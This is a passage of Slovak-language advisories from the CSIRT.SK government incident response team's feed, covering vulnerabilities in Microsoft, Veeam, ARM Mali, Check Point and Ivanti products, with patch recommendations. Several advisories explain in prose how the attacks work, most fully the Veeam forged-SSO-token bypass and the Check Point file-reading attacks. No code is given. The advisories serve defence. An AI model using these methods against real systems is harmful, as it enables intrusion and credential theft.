<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 version 21H2 for ARM64-based Systems</li>



<li>Windows 11 version 21H2 for x64-based Systems</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>Spoločnosť Microsoft opravila v&nbsp;rámci svojho pravidelného balíka aktualizácií Patch Tuesday 51 zraniteľností, z&nbsp;toho je 1 je označená ako kritická. Najzávažnejšie zraniteľnosti umožňujú vzdialené vykonanie kódu, eskaláciu privilégií, získanie neoprávneného prístupu k&nbsp;citlivým údajom, či zneprístupnenie služby. Zraniteľnosti zatiaľ nie sú aktívne zneužívané.</strong></p>



<p><strong>CVE-2024-30080</strong> (CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť v&nbsp;produkte Microsoft Message Queuing (MSMQ) spočíva vo využití odalokovaného miesta v&nbsp;pamäti a umožňuje vzdialenému neautentifikovanému útočníkovi vykonanie škodlivého kódu na MSMQ serveri. Zraniteľnosť je možné zneužiť zaslaním špeciálne vytvoreného MSMQ paketu. Nakoľko sa jedná o&nbsp;voliteľnú súčasť operačných systémov Windows, zraniteľnosť možno zneužiť len na systémoch, kde je aktivovaná.</p>



<p><strong>CVE-2024-30103&nbsp;</strong>(CVSS skóre 8,8)</p>



<p>Zraniteľnosť v&nbsp;Microsoft Outlook umožňuje obídenie blacklist v&nbsp;registroch Outlook a vzdialený autentifikovaný útočník by ju mohol zneužiť na vykonanie škodlivého kódu na úrovni použivateľských oprávnení obete. Jedná sa o&nbsp;tzv. zero-click zraniteľnosť, ktorá nevyžaduje priamo interakciu s&nbsp;obsahom e-mailu a k&nbsp;jej zneužitiu dochádza pri otvorení e-mailu. Bezpečnostní výskumníci plánujú v&nbsp;auguste zverejniť aj proof-of-concept kód demonštrujúci návod na zneužitie zraniteľnosti.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladné nasadenie júnového balíka opráv na zraniteľné produkty spoločnosti Microsoft, ku ktorým aktualizácie nájdete&nbsp;</strong><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Jun">tu</a><strong>.</strong></p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Jun">https://msrc.microsoft.com/update-guide/releaseNote/2024-Jun</a></p>



<p><a href="https://thehackernews.com/2024/06/microsoft-issues-patches-for-51-flaws.html">https://thehackernews.com/2024/06/microsoft-issues-patches-for-51-flaws.html</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30080">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30080</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30103">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30103</a></p>



<p><a href="https://blog.morphisec.com/cve-2024-30103-microsoft-outlook-vulnerability">https://blog.morphisec.com/cve-2024-30103-microsoft-outlook-vulnerability</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1033/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – máj 2024</title>
		<link>/posts/1035</link>
					<comments>/posts/1035#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 14 Jun 2024 06:07:57 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<guid isPermaLink="false">/?p=1035</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci máj 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci máj 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/06/MS2024-05.pdf" data-type="link" data-id="/wp-content/uploads/2024/06/MS2024-05.pdf">Mesačná správa – 05/2024 PDF (910 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas" data-type="link" data-id="/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a><a href="https://www.csirt.gov.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas.html?csrt=16888374950890012865">.</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1035/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti Veeam</title>
		<link>/posts/1010</link>
					<comments>/posts/1010#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 13 Jun 2024 10:44:16 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1010</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>Spoločnosť Veeam vydala bezpečnostnú aktualizáciu Backup &#38; Replication, ktorá rieši viacero zraniteľností umožňujúcich neoverenému útočníkovi obchádzanie bezpečnostných prvkov, zvýšenie privilégií...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>
<p><strong>Spoločnosť Veeam vydala bezpečnostnú aktualizáciu Backup &amp; Replication, ktorá rieši viacero zraniteľností umožňujúcich neoverenému útočníkovi obchádzanie bezpečnostných prvkov, zvýšenie privilégií alebo vzdialené vykonávanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Veeam Backup &amp; Replication verzie | 5.0 | 6.1 | 6.5 | 7.0 | 8.0 | 9.0 | 9.5 | 10 | 11 | 12 | 12.1</li>



<li>Veeam Agent for Windows (VAW) verzie 2.0 až 6.1</li>



<li>Veeam Service Provider Console (VSPC) | 4.0 | 5.0 | 6.0 | 7.0 | 8.0</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-29849 (CVSS skóre 9,8)</strong></p>



<p><strong>Kritická zraniteľnosť CVE-2024-29849 umožňuje neoverenému útočníkovi prihlásiť sa do webového rozhrania Veeam Backup Enterprise Manager ako ľubovoľný používateľ.</strong></p>



<p>Zraniteľná je služba &#8220;Veeam.Backup.Enterprise.RestAPIService.exe&#8221;, ktorá beží na porte TCP 9398 a slúži ako server REST API pre webovú aplikáciu. Útočník môže zneužiť túto chybu <strong>odoslaním špeciálne vytvoreného tokenu jednotného prihlásenia VMware (SSO) do zraniteľnej služby</strong>. Token obsahuje falošnú požiadavku na overenie ako správca a adresu URL servera SSO, ktorú Veeam neoveruje. Token SSO zakódovaný v base64 sa dekóduje a interpretuje ako XML a overuje sa prostredníctvom požiadavky SOAP na adresu URL kontrolovanú útočníkom<strong>. Falošný server útočníka odpovie na požiadavku na overenie kladne</strong>, čím Veeam overí token a udeľuje útočníkovi prístup správcu.<strong></strong></p>



<p><strong>CVE-2024-29850 (CVSS skóre 8,8)</strong></p>



<p><strong>Zraniteľnosť CVE-2024-29850 umožňuje prevzatie účtu prostredníctvom NTLM relay útoku.</strong></p>



<p><strong>CVE-2024-29851 (CVSS skóre: 7,2)</strong><strong></strong></p>



<p><strong>Chyba CVE-2024-29851 umožňuje privilegovanému používateľovi ukradnúť NTLM hash účtu služby Veeam Backup Enterprise Manager, pokiaľ &nbsp;sa nejedná o&nbsp;prednastavený účet Local System.</strong></p>



<p><strong>Spoločnosť Veeam vyriešila v&nbsp;posledných týždňoch aj ďalšie zraniteľnosti:</strong></p>



<p><strong>CVE-2024-29212 (CVSS skóre: 9,9)</strong><strong></strong></p>



<p><strong>Kritická zraniteľnosť CVE-2024-29212 ovplyvňuje Veeam Service Provider Console a&nbsp;umožňuje vzdialené vykonávanie kódu na serveri.</strong></p>



<p><strong>CVE-2024-29853 (CVSS skóre 7,2)</strong></p>



<p><strong>Chyba CVE-2024-29853 umožňuje lokálne zvýšenie oprávnení vo&nbsp;Veeam Agent pre Windows.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Zvýšenie oprávnení</strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia</strong> Veeam Backup &amp; Replication<strong> na najnovšiu verziu alebo aspoň na verziu 12.1.2.172. </strong>Pokiaľ aktualizácia nie je možná, spoločnosť Veeam odporúča zastaviť program Backup Enterprise Manager alebo ďalšie možnosti mitigácie nájdete <strong><a href="https://www.bleepingcomputer.com/news/security/exploit-for-critical-veeam-auth-bypass-available-patch-now/">tu</a></strong>.</p>



<p>Aktualizácia Veeam Agent for Windows aspoň na verziu 6.1.2 (build 6.1.2.134).</p>



<p>Aktualizácia Veeam Service Provider Console aspoň na verziu 7.0.0.18899 alebo 8.0.0.19236.</p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.securityweek.com/critical-veeam-vulnerability-leads-to-authentication-bypass/">https://www.securityweek.com/critical-veeam-vulnerability-leads-to-authentication-bypass/</a></p>



<p><a href="https://thehackernews.com/2024/05/critical-veeam-backup-enterprise.html">https://thehackernews.com/2024/05/critical-veeam-backup-enterprise.html</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-28949">https://nvd.nist.gov/vuln/detail/CVE-2024-28949</a></p>



<p><a href="https://www.veeam.com/kb4581">https://www.veeam.com/kb4581</a></p>



<p><a href="https://www.veeam.com/kb4575">https://www.veeam.com/kb4575</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/exploit-for-critical-veeam-auth-bypass-available-patch-now/">https://www.bleepingcomputer.com/news/security/exploit-for-critical-veeam-auth-bypass-available-patch-now/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1010/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Grafické procesory ARM Mali majú aktívne zneužívanú zraniteľnosť</title>
		<link>/posts/1024</link>
					<comments>/posts/1024#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 13 Jun 2024 10:43:07 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1024</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/06/arm-1024x576.jpg" alt="" /></p>Aktívne zneužívaná zraniteľnosť ovládača grafických procesorov ARM Mali Valhall a&#160;Bifrost umožňuje útočníkom bez oprávnení získať prístup k&#160;dealokovanej pamäti GPU. Zraniteľné...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/06/arm-1024x576.jpg" alt="" /></p>
<p><strong>Aktívne zneužívaná zraniteľnosť ovládača grafických procesorov ARM Mali Valhall a&nbsp;Bifrost umožňuje útočníkom bez oprávnení získať prístup k&nbsp;dealokovanej pamäti GPU.</strong><strong></strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>Bifrost GPU Kernel Driver vo verzii r34p0 až r40p0</p>



<p>Valhall GPU Kernel Driver vo verzii r34p0 až r40p0</p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-4610</strong> (CVSS v3.1 skóre 5,5)</p>



<p>V&nbsp;ovládačoch grafických procesorov <strong>ARM Mali série Valhall a Bifrost</strong> sa nachádza <strong>aktívne zneužívaná</strong> zraniteľnosť, ktorá umožňuje <strong>lokálnemu útočníkovi bez oprávnení</strong> získať prístup k&nbsp;<strong>dealokovanej pamäti</strong>. Spoločnosť ARM sa vyjadrila, že chyba zabezpečenia umožňuje vykonávať nevhodné operácie s&nbsp;pamätou GPU.</p>



<p>Séria grafických čipov Bifrost sa používa v&nbsp;smartfónoch a tabletoch (Mali G31, G51, G52, G71, G76), kompaktných počítačoch, Chromebookoch a&nbsp;vstavaných systémoch. Sériu Valhall je možné nájsť v high-end smartfónoch a tabletoch (Mali G57, G77), infotainmentových systémoch automobilov a výkonných smart TV.</p>



<p><strong>Závažnosť zraniteľnosti: </strong>Stredná</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonávanie ľubovoľného kódu</strong></li>



<li><strong>Neoprávnený prístup k citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia </strong>Bifrost a Valhall GPU Kernel Driver aspoň na verziu r41p0 (aktuálna verzia je r49p0)<strong>.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.bleepingcomputer.com/news/security/arm-warns-of-actively-exploited-flaw-in-mali-gpu-kernel-drivers/">https://www.bleepingcomputer.com/news/security/arm-warns-of-actively-exploited-flaw-in-mali-gpu-kernel-drivers/</a></p>



<p><a href="https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities">https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-4610">https://nvd.nist.gov/vuln/detail/CVE-2024-4610</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1024/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností máj 2024</title>
		<link>/posts/1015</link>
					<comments>/posts/1015#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 06 Jun 2024 14:04:57 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<guid isPermaLink="false">/?p=1015</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci máj 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci máj 2024.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/06/2024_05_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/06/2024_05_mesacnik.pdf" target="_blank" rel="noreferrer noopener">Mesačný prehľad – 05/2024 PDF (272kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softverovych-zranitelnosti" target="_blank" rel="noreferrer noopener">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1015/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Útočníci kradnú heslá do VPN cez zraniteľnosť v bezpečnostných bránach spoločnosti Check Point</title>
		<link>/posts/1012</link>
					<comments>/posts/1012#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 04 Jun 2024 08:32:35 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1012</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/06/check.png" alt="" /></p>Spoločnosť Check Point vydala bezpečnostné aktualizácie pre aktívne zneužívanú zraniteľnosť vedúcu k&#160;úniku citlivých informácií, zneužiteľných na prienik do siete a&#160;laterálny...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/06/check.png" alt="" /></p>
<p><a><strong>Spoločnosť Check Point vydala bezpečnostné aktualizácie pre aktívne zneužívanú zraniteľnosť vedúcu k&nbsp;úniku citlivých informácií, zneužiteľných na prienik do siete a&nbsp;laterálny pohyb v&nbsp;nej</strong></a><strong>. Zraniteľnosť zasahuje bezpečnostné brány </strong><strong>Network Security Gateway s&nbsp;povolenými službami Remote Access VPN alebo Mobile Access. Útočníci môžu získať hashe hesiel používateľských účtov a&nbsp;prístup k&nbsp;Active Directory. </strong>Zneužitím exfiltrovaných údajov je možné dosiahnuť aj vzdialené vykonanie kódu.<strong></strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>CloudGuard Network</li>



<li>Quantum Maestro</li>



<li>Quantum Scalable Chassis</li>



<li>Quantum Security Gateways</li>



<li>Quantum Spark</li>
</ul>



<p><strong>Verzie:</strong> R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20</p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-24919 </strong>(CVSS 3.1 skóre 8,6)</p>



<p><strong>Aktívne zneužívaná</strong> zraniteľnosť, ktorá umožňuje <strong>vzdialeným</strong> útočníkom <strong>získať citlivé informácie</strong> zo zraniteľných brán Check Point (<strong>Security Gateway)</strong> s&nbsp;povolenými službami <strong>Remote Access VPN alebo Mobile Access</strong>. Útočníci môžu získať neoprávnený prístup k&nbsp;všetkým súborom na súborovom systéme zariadenia, vrátane súborov obsahujúcich hashe hesiel lokálnych používateľských účtov, privátnych SSH kľúčov, certifikátov a&nbsp;ďalších súborov s&nbsp;citlivými údajmi. Zneužitím exfiltrovaných údajov je možné dosiahnuť aj vzdialené vykonanie kódu. Útočníci nepotrebujú oprávnenia, ani interakciu obete. Zameriavajú sa na staršie lokálne <strong>účty VPN chránené iba heslom</strong>, z&nbsp;ktorých dokážu získať <strong>hashe hesiel</strong>. Tieto môžu slúžiť aj ako servisné účty s&nbsp;<strong>prístupom do Active Directory</strong>.</p>



<p>Výskumníci spoločnosti watchTowr, ktorí zraniteľnosť analyzovali, dospeli k&nbsp;záveru, že chyba súvisí s&nbsp;nedostatočnou kontrolou požiadaviek HTTP POST, čo umožňuje prechod medzi adresármi a čítanie ľubovoľných súborov. <strong>Okrem úniku informácií</strong> môže viesť až k&nbsp;schopnosti <strong>vzdialene vykonávať kód</strong>.</p>



<p>Pri zaznamenaných útokoch získali útočníci prístup k&nbsp;súborom <strong>ntds.dit</strong>, obsahujúcim informácie o&nbsp;používateľoch v&nbsp;doméne, vrátane hashov hesiel ich doménových účtov. Dokázali sa tiež laterálne pohybovať po sieti a&nbsp;zneužili Visual Studio Code pre prenos škodlivých požiadaviek.</p>



<p>Spoločnosť Check Point <strong>vydala hotfix</strong>, ktorý automaticky blokuje a loguje pokusy o&nbsp;prihlásenie pomocou slabých hesiel.</p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Prienik do siete</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Výrobca odporúča nasadiť hotfix pre zraniteľné verzie a&nbsp;vykonať mitigačné opatrenia, ktoré popisuje na </strong><a href="https://support.checkpoint.com/results/sk/sk182336"><strong>svojom webe</strong></a><strong>. Okrem iného viaceré zdroje odporúčajú:</strong></p>



<ul>
<li><strong>odstrániť lokálnych používateľov na zraniteľných zariadeniach,</strong></li>



<li><strong>pokiaľ tieto kontá potrebujete, pridajte k heslu ďalší faktor pre autentifikáciu,</strong></li>



<li><strong>vynútiť zmeny hesiel,</strong></li>



<li><strong>skontrolovať prístupové logy na prípadnú kompromitáciu. Skorelovať prihlásenia heslom s&nbsp;aktivitou môžete napríklad v&nbsp;SmartConsole dopytom <em>action:&#8221;Log In&#8221; AND auth_method:Password AND blade:&#8221;Mobile Access&#8221;</em>.</strong></li>
</ul>



<p><strong>Zdroje:</strong></p>



<p><a href="https://support.checkpoint.com/results/sk/sk182336">https://support.checkpoint.com/results/sk/sk182336</a></p>



<p><a href="https://blog.checkpoint.com/security/enhance-your-vpn-security-posture">https://blog.checkpoint.com/security/enhance-your-vpn-security-posture</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/check-point-vpn-zero-day-exploited-in-attacks-since-april-30/">https://www.bleepingcomputer.com/news/security/check-point-vpn-zero-day-exploited-in-attacks-since-april-30/</a></p>



<p><a href="https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/">https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/</a></p>



<p><a href="https://www.mnemonic.io/resources/blog/advisory-check-point-remote-access-vpn-vulnerability-cve-2024-24919/">https://www.mnemonic.io/resources/blog/advisory-check-point-remote-access-vpn-vulnerability-cve-2024-24919/</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-24919">https://nvd.nist.gov/vuln/detail/CVE-2024-24919</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1012/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Bezpečnostné zraniteľnosti v produktoch Ivanti</title>
		<link>/posts/1008</link>
					<comments>/posts/1008#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 28 May 2024 06:28:16 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ACE]]></category>
		<category><![CDATA[DoS]]></category>
		<guid isPermaLink="false">/?p=1008</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 16 bezpečnostných zraniteľností v&#160;produktoch Avalanche, Neurons for ITSM, Neurons for ITAM, Connect Secure,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>
<p><strong>Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 16 bezpečnostných zraniteľností v&nbsp;produktoch Avalanche, Neurons for ITSM, Neurons for ITAM, Connect Secure, Policy Secure, Secure Access a&nbsp;Endpoint Manager. Najzávažnejšie sú kritické zraniteľnosti v&nbsp;produkte Endpoint Manager, ktoré možno zneužiť na vykonanie škodlivého kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ivanti Avalanche vo verzii staršej ako 6.4.3.602</li>



<li>Ivanti Neurons for ITSM (cloud aj premise) všetky verzie bez aktualizácie Hotfix 2</li>



<li>Ivanti Neurons for ITAM (cloud aj premise) všetky verzie bez aktualizácie Hotfix 2</li>



<li>Ivanti Connect Secure vo verziách starších ako 9.1R18.6, 22.7R2 a 22.5R2.4</li>



<li>Ivanti Policy Secure vo verzii staršej ako 22.7R1</li>



<li>Ivanti Secure Access vo verzii staršej ako 22.7R1</li>



<li>Ivanti Endpoint Manager vo verziách 2022 SU5 a starších</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>Spoločnosť Ivanti vydala bezpečnostné aktualizácie na svoje portfólio produktov, ktoré opravujú 16 bezpečnostných zraniteľností, z&nbsp;toho 6 kritických a&nbsp;10 vysoko závažných. Kritické zraniteľnosti v&nbsp;produkte Endpoint Manager (CVE-2024-29822, CVE-2024-29823, CVE-2024-29824, CVE-2024-29825, CVE-2024-29826, CVE-2024-29827) by neautentifikovaný útočník nachádzajúci sa v&nbsp;rovnakej sieti mohol zneužiť na vykonanie škodlivého kódu. Ostatné zraniteľnosti možno zneužiť na eskaláciu privilégií, vykonanie kódu, zneprístupnenie služby a&nbsp;vykonanie neoprávnených zmien v&nbsp;systéme.</strong></p>



<p><strong><u>Ivanti Endpoint Manager</u></strong></p>



<p><strong>CVE-2024-29822, CVE-2024-29823, CVE-2024-29824, CVE-2024-29825, CVE-2024-29826, CVE-2024-29827&nbsp; </strong>(CVSS skóre 9,6)</p>



<p>Kritické bezpečnostné zraniteľnosti v&nbsp;komponente Core server umožňujú vykonanie SQL injekcie. Neautentifikovaný útočník nachádzajúci sa v&nbsp;rovnakej sieti by ich mohol zneužiť na vykonanie škodlivého kódu.</p>



<p><strong>CVE-2024-29828, CVE-2024-29829, CVE-2024-29830, CVE-2024-29846&nbsp; </strong>(CVSS skóre 8,4)</p>



<p>Bližšie nešpecifikované zraniteľnosti v komponente Core server by autentifikovaný útočník s&nbsp;oprávneniami administrátora prostredníctvom SQL injekcie mohol zneužiť na vykonanie škodlivého kódu. Zneužitie zraniteľností vyžaduje, aby sa útočník nachádzal v&nbsp;rovnakej sieti ako zraniteľná inštalácia produktu.</p>



<p><strong><u>Ivanti Neurons for ITSM, Ivanti Neurons for ITAM</u></strong></p>



<p><strong>CVE-2024-22059&nbsp; </strong>(CVSS skóre 8,8)</p>



<p>Zraniteľnosť sa nachádza vo webovom komponente produktu a&nbsp;vzdialený autentifikovaný útočník by ju prostredníctvom SQL injekcie mohol zneužiť na čítanie a&nbsp;modifikáciu obsahu databázy a&nbsp;následné zneprístupnenie služby.</p>



<p><strong>CVE-2024-22060&nbsp; </strong>(CVSS skóre 8,7)</p>



<p>CVE-2024-22060 vo webovom komponente umožňuje vzdialenému autentifikovanému útočníkovi s&nbsp;vysokými oprávneniami upload ľubovoľných súborov do priečinkov servera ITSM, v&nbsp;ktorých sú ukladané citlivé údaje.</p>



<p>Pozn.: Spoločnosť Ivanti automaticky aktualizovala cloudové inštalácie Neurons for ITSM a&nbsp;Neurons for ITAM. Manuálna inštalácia aktualizácií je nutná len na lokálnych (on premise) inštaláciách produktu.</p>



<p><strong><u>Ivanti Connect Secure, Ivanti Policy Secure</u></strong></p>



<p><strong>CVE-2023-38551&nbsp; </strong>(CVSS skóre 8,2)</p>



<p>Zraniteľnosť s&nbsp;označením CVE-2023-38551 spočíva v&nbsp;nedostatočnom overovaní používateľských vstupov a&nbsp;vzdialený autentifikovaný používateľ s&nbsp;vysokými oprávneniami by ju prostredníctvom CRLF injekcie mohol zneužiť na realizáciu XSS (Cross Site Scripting) útokov.</p>



<p><strong><u>Ivanti Secure Access</u></strong></p>



<p><strong>CVE-2023-38042&nbsp; </strong>(CVSS skóre 7,8), <strong>CVE-2023-46810&nbsp; </strong>(CVSS skóre 7,3)</p>



<p>Zraniteľnosti v&nbsp;klientskych aplikáciách Ivanti Secure Access pre Windows a&nbsp;Linux umožňujú eskaláciu privilégií lokálneho autentifikovaného útočníka a&nbsp;následné vykonanie kódu s&nbsp;oprávneniami úrovne SYSTEM.</p>



<p><strong><u>Ivanti Avalanche</u></strong></p>



<p><strong>CVE-2024-29848&nbsp; </strong>(CVSS skóre 7,2)</p>



<p>CVE-2024-29848 nachádzajúca sa v&nbsp;komponente FileStoreConfig umožňuje autentifikovanému útočníkovi upload ľubovoľných súborov a&nbsp;následné vykonanie škodlivého kódu s&nbsp;oprávneniami SYSTEM.</p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie kódu</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



